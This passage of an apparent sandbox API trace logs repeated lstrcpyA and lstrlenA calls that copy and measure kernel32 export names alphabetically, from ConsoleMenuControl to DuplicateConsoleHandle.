lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.873] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.873] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.873] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.873] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.873] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.873] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.873] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.873] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.873] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.873] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.873] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.873] lstrlenA (lpString="COPYFILEA") returned 9 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.874] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.874] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.874] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.874] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.874] lstrlenA (lpString="COPYFILEW") returned 9 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.874] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.874] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.874] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.874] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.874] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.874] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.874] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.874] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.874] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.874] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.874] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.874] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.874] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.874] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.875] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.875] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.875] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.875] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.875] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.875] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.875] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.875] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.875] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.875] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.875] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.875] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.875] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.875] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.875] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.875] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.875] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.875] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.875] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.875] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.876] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.876] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.876] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.876] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.876] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.876] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.876] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.876] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.876] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.876] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.876] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.876] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.876] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.876] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.876] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.876] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.876] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.876] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.876] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.876] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.877] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.877] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.877] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.877] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.877] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.877] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.877] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.877] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.877] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.877] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.877] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.877] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.877] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.877] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.877] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.877] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.877] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.877] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.877] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.877] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.878] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.878] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.878] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.878] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.878] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.878] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.878] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.878] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.878] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.878] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.878] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.878] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.878] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.878] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.878] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.878] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.878] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.878] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.878] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.878] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.879] lstrlenA (lpString="DELETEATOM") returned 10 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.879] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.879] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.879] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.879] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.879] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.879] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.879] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.879] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.879] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.879] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.879] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.879] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.879] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.879] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.879] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.879] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.879] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.879] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.880] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.880] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.880] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.880] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.880] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.880] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.880] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: 